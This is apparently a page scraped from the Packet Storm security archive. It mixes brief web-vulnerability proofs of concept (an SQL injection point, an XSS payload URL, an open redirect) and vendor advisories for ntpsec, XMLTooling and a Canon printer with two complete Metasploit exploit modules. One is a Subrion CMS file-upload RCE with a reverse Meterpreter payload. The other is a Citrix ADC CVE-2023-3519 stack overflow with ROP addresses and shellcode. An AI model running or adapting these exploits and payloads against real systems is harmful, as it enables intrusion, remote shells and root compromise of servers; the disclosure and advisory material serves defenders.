CMS Genetics Centre version 4.0.1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS Genetics Centre v 4.0.1 Sql injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://nanobirdtech.com/                                                                                          |  | # Dork      : by Nanobird Technologies                                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/www/omanadvancedfertilitycom/en/news-detail.php?id=2 <======| inject here[+]  Panel : http://127.0.0.1/www/omanadvancedfertility/com/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

CMS Genetics Centre 4.0.1 SQL Injection

CMS BMGI International version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /_Admin_root/authentification.php?lang=%3Cscript%3Ealert(/indoushka/);%3C/script%3E&pw=1&user=yymfqisv[+] http://127.0.0.1/inspa-dzorg/_Admin_root/authentification.php?lang=%3Cscript%3Ealert(/indoushka/);%3C/script%3E&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 Cross Site Scripting

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

**Coupons CMS 6.00 Open Redirection**

Posted Aug 7, 2023

Authored by indoushka

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 6f1d614850036145fc311bc9ae50d863cc9b83863f612a7fda85ed6a6e596b35

Download | Favorite | View

**Coupons CMS 6.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v6.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,889)
*   Arbitrary (16,186)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,341)
*   DoS (23,405)
*   Encryption (2,369)
*   Exploit (51,802)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,765)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,688)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,600)
*   Python (1,534)
*   Remote (30,742)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,354)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,754)
*   Web (9,655)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,919)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,807)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,382)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,683)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,797)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Coupons CMS 6.00 Open Redirection

Conference Management Software version 3.5.1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Conference Management Software V3.5.1 Sql injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : Designer Asan Hamayesh (Conference Management Software) Ver. 3.5.1                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/icmaes2017com//en/files.php?id=2 <===== inject here[+] Login : http://127.0.0.1/icmaes2017com/en/signin.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Conference Management Software 3.5.1 SQL Injection

Debian Linux Security Advisory 5466-1 - It was discovered that ntpd in ntpsec, a secure, hardened, and improved implementation derived from the original NTP project, could crash if NTS is disabled and an NTS-enabled client request (mode 3) is received.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5466-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 04, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ntpsecCVE ID         : CVE-2023-4012Debian Bug     : 1038422It was discovered that ntpd in ntpsec, a secure, hardened, and improvedimplementation derived from the original NTP project, could crash if NTSis disabled and an NTS-enabled client request (mode 3) is received.For the stable distribution (bookworm), this problem has been fixed inversion 1.2.2+dfsg1-1+deb12u1.We recommend that you upgrade your ntpsec packages.For the detailed security status of ntpsec please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/ntpsecFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTMiPdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QCoRAAiCGW5caem2KkAZjuk/GUZ6Gd1/FIiyU5rYJQ403XJs3rfB4plt1FiEjMdNy3TpoUXmngXKhuJTmEEtRvCjkP1mw6CytsWqhPAJSPuHznLYsdbm9wUBA3vVec2efb31KXaye3L764GgardYuKSei2i+FtToejls72qFjAxXSPreYaSbTXHUMpTqI31vMpG8fDhijJP3Ax1JSsGOwHxnudg9/WPGrkVnRlJ0VTWxDJchVGGOvUaXyy13quZYI3YK8cBWQVTu7SSVNiEpZ1LxoBTw84mNoDoVCpoW72oNiZGYoA4Ff45JoSQz0mj73Vqd6j2+E8xZdwri/f483XTd+KVbimomSZZ5ks8eE9+X35LZxA7vfdEuhrD0QhVuDO3z7TTqRMhW5aAWjNs27uH6tynxNvw4ShEi0iegLkZH930Q7dHe6CptJvQcemlzdE0teNRlg7+/W+h64QyY7wrqBou+Hkv+lP+gABUfzjS10YwY5ZrzwBdPTvFS7//esIhIf72Mg1FTNJvC2s6TirOnxu90b6JjabAcObBkXDmL/KlEid7Rl67sTvaLV/V+9c6Jy9NXlvyoXvBJJ7cOTkKYok1LowIwvtzEiwFBiZCeA+B4g8rgePL7ZiPOAzUuq7kwDMj5hU+jYfVs2iAcavWpXBIOgryKibn2wNkQW+NxjSMA4==L3OU-----END PGP SIGNATURE-----

Debian Security Advisory 5466-1

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage (EEPROM). Resetting the product to factory settings does not securely delete this sensitive information. Versions 1.020 and 1.080 are affected.

Advisory ID:               SYSS-2023-011  
Product:                   PIXMA TR4550  
Manufacturer:              Canon  
Affected Version(s):       1.020 / 1.080  
                            also affects many other Canon inkjet printer  
                            models[4]  
Tested Version(s):         1.020 / 1.080  
Vulnerability Type:        Insufficient or Incomplete Data Removal  
                            within Hardware Component (CWE-1301)  
                            Insufficiently Protected Credentials  
                            (CWE-522)  
Risk Level:                Low  
Solution Status:           Fixed  
Manufacturer Notification: 2023-04-06  
Solution Date:             2023-07-31  
Public Disclosure:         2023-08-03  
CVE Reference:             No CVE ID from Canon PSIRT  
Author of Advisory:        Manuel Stotz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with  
Wi-Fi connectivity.

The manufacturer describes the product as follows (see [1]):

"Ready to adapt to your smart home office environment, this efficient  
4-In-One printer requires minimal space but gives maximum support to  
your projects. Whether scanning a document, copying an ID, faxing an  
invoice or printing posters, PIXMA TR4550 has the functionality to keep  
up with your business needs. Equipped with smart Wi-Fi connectivity to  
optimise management of functions and features, this front-loading  
4-In-One printer is the compact solution that saves space, streamlines  
ink usage and brings productivity to the forefront."

The unprotected storage of credentials and insufficient data removal  
during a factory reset allows sensitive data to be read out afterward.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the  
Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage  
(EEPROM).

Resetting the product to factory settings (via 'Setup', 'Device  
settings', 'Reset setting' and 'All data') does not securely delete this  
sensitive information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS could successfully perform a proof-of-concept attack via the  
following steps:

* Configure and establish a Wi-Fi connection.  
* Reset all data (Setup, Device settings, Reset setting, All data).  
* Disassemble the printer and locate the EEPROM on the PCB.  
* Create an EEPROM memory dump.  
* Search and locate the configured SSID and PSK in the memory dump.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Canon PSIRT published its security advisory "Vulnerability  
Mitigation/Remediation for Inkjet Printers (Home and Office/Large  
Format)" (CP2023-003)[3] describing how sensitive information should be  
deleted concerning the affected printers[5].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-04-06: Vulnerability reported to manufacturer  
2023-04-12: Canon PSIRT creates ticket  
2023-04-27: Update from Canon concerning ongoing analysis  
2023-05-15: Canon confirms security issue  
2023-05-23: Agreement on public disclosure date  
2023-07-17: Canon PSIRT informs about scheduled publication of their  
             security advisory  
2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability  
             Mitigation/Remediation Format Inkjet Printers (Home and  
             Office/Large Format)" (CP2023-003)[3]  
2023-08-03: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Canon PIXMA TR4550

 https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html  
[2] SySS Security Advisory SYSS-2023-011

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt  
[3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers   
(Home and Office/Large Format)  
     https://psirt.canon/advisory-information/cp2023-003/  
[4] List of affected printers

 https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc  
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Canon PIXMA TR4550 1.020 / 1.080 Unencrypted Secret Storage

Ubuntu Security Notice 6274-1 - Jurien de Jong discovered that XMLTooling did not properly handle certain KeyInfo element content within an XML signature. An attacker could possibly use this issue to achieve server-side request forgery.

==========================================================================  
Ubuntu Security Notice USN-6274-1  
August 03, 2023

xmltooling vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

XMLTooling could be made to allow for unintended server side actions  
if it received specially crafted input.

Software Description:  
- xmltooling: C++ XML parsing library with encryption support

Details:

Jurien de Jong discovered that XMLTooling did not properly handle certain  
KeyInfo element content within an XML signature. An attacker could possibly  
use this issue to achieve server-side request forgery.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libxmltooling6v5                1.5.6-2ubuntu0.3+esm1

After a standard system update you need to restart the  
shibd process to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6274-1  
   CVE-2023-36661

Ubuntu Security Notice USN-6274-1

This Metasploit module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::PhpEXE  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',        'Description' => %q{          This module exploits an authenticated file upload vulnerability in          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by          the .htaccess file not preventing the execution of .pht, .phar, and          .xhtml files. Files with these extensions are not included in the          .htaccess blacklist, hence these files can be uploaded and executed          to achieve remote code execution. In this module, a .phar file with          a randomized name is uploaded and executed to receive a Meterpreter          session on the target, then deletes itself afterwards.        },        'License' => MSF_LICENSE,        'Author' => [          'Hexife',             # Original discovery, PoC, and CVE submission          'Fellipe Oliveira',   # ExploitDB author          'Ismail E. Dawoodjee' # Metasploit module author        ],        'References' => [          [ 'EDB', '49876' ],          [ 'CVE', '2018-19422' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]        ],        'Platform' => 'php',        'Arch' => ARCH_PHP,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2018-11-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(80, true, 'Subrion CMS default port'),        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])      ]    )  end  def check    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash    print_status("Checking target web server for a response at: #{full_uri(uri)}")    res = send_request_cgi({      'method' => 'GET',      'uri' => uri    })    unless res      return CheckCode::Unknown('Target did not respond to check request.')    end    unless res.code == 200 && res.body.downcase.include?('subrion')      return CheckCode::Unknown('Target is not running Subrion CMS.')    end    print_good('Target is running Subrion CMS.')    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>    print_status('Checking Subrion CMS version...')    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first    unless version_number      return CheckCode::Detected('Subrion CMS version cannot be determined.')    end    print_good("Target is running Subrion CMS Version #{version_number}.")    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')      return CheckCode::Appears(        'However, this version check does not guarantee that the target is vulnerable, ' \        'since a fix for the vulnerability can easily be applied by a web admin.'      )    end    return CheckCode::Safe  end  def login_and_get_csrf_token(username, password)    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')    # Session cookies need to be kept to preserve the CSRF token across multiple requests    uri = normalize_uri(target_uri.path, 'panel/')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true    })    unless res && res.code == 200      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")    end    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?    print_good("Successfully obtained CSRF token: #{csrf_token}")    print_status(      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"    )    auth = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'keep_cookies' => true,      'vars_post' => {        '__st' => csrf_token,        'username' => username,        'password' => password      }    })    unless auth && auth.code == 200      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")    end    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")    end    print_good('Successfully logged in as Administrator.')    return csrf_token  end  def upload_and_execute_payload(csrf_token)    print_status('Preparing payload...')    # set `unlink_self: true` to delete the file after execution    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"    php_payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')    data.add_part('upload', nil, nil, 'form-data; name="cmd"')    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')    data.add_part(      "#{php_payload}\n",      'application/octet-stream',      nil,      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""    )    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')    print_status('Sending POST data...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => data.to_s    })    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")    end    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")    # This execution request returns nil    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")    send_request_cgi({      'method' => 'GET',      'uri' => payload_uri,      'keep_cookies' => true    })    print_good("Successfully executed payload: #{full_uri(payload_uri)}")  end  def exploit    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])    upload_and_execute_payload(csrf_token)  endend

Intelliants Subrion CMS 4.2.1 Remote Code Execution

A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',        'Description' => %q{          A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in          remote code execution as root.        },        'Author' => [          'Ron Bowes', # Analysis and module          'Douglass McKee', # Analysis and module          'Spencer McIntyre', # Just the module        ],        'References' => [          ['CVE', '2023-3519'],          ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],          ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']        ],        'DisclosureDate' => '2023-07-18',        'License' => MSF_LICENSE,        'Platform' => ['unix'],        'Arch' => [ARCH_CMD],        'Payload' => {          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']          'Space' => 2048,          'DisableNops' => true        },        'Targets' => [          [            'Citrix ADC 13.1-48.47',            {              'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x13a8,              'popen' => 0x01da6340,              'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp              'return_offset' => 168            },          ],          [            'Citrix ADC 13.1-37.38',            {              'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x13a8,              'popen' => 0x01d7e320,              'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback              'return_offset' => 168            },          ],          [            'Citrix ADC 13.0-91.12',            {              'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x12e0,              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit              # clobbers it, the value needs to be restored              'fixup_rbp_adjustment' => 0x190,              'popen' => 0x01f42ec0,              'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic              'return_offset' => 168            }          ]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'WfsDelay' => 10        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    res = send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')    })    return CheckCode::Unknown if res.nil?    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/    CheckCode::Detected  end  def exploit    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string      call loc_popen_arg1        ; add this to the path for python payloads        db "export PATH=/var/python/bin:$PATH;"        db "#{Rex::Text.to_hex(payload.encoded)}", 0      loc_popen_arg1:        pop  rdi      call loc_popen_arg2        db "r", 0      loc_popen_arg2:        pop rsi        mov  rax, <%= target['popen'] %>        sub  rsp, 0x200        call rax      loc_return:        xor rax, rax        add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %>        <% if target['fixup_rbp_adjustment'] %>        mov rbp, rsp        add rbp, <%= target['fixup_rbp_adjustment'] %>        <% end %>        push     <%= target['fixup_return'] %>        ret    SHELLCODE    buffer = rand_text_alphanumeric(target['return_offset'])    buffer << [target['return']].pack('Q')    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join    send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),      'encode_params' => false,  # we'll encode them ourselves      'vars_get' => {        'event' => 'start',        'target' => buffer      }    })  end  class Template    def self.render(template, context = nil)      case context      when Hash        b = binding        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }        b.eval(locals.join)      when NilClass        b = binding      else        raise ArgumentError      end      b.eval(Erubi::Engine.new(template).src)    end  endend

Citrix ADC (NetScaler) Remote Code Execution

GnuTLS is a secure communications library implementing the SSL and TLS protocols and technologies around them. It provides a simple C language application programming interface (API) to access the secure communications protocols, as well as APIs to parse and write X.509, PKCS #12, OpenPGP, and other required structures. It is intended to be portable and efficient with a focus on security and interoperability.

Source

Packet Storm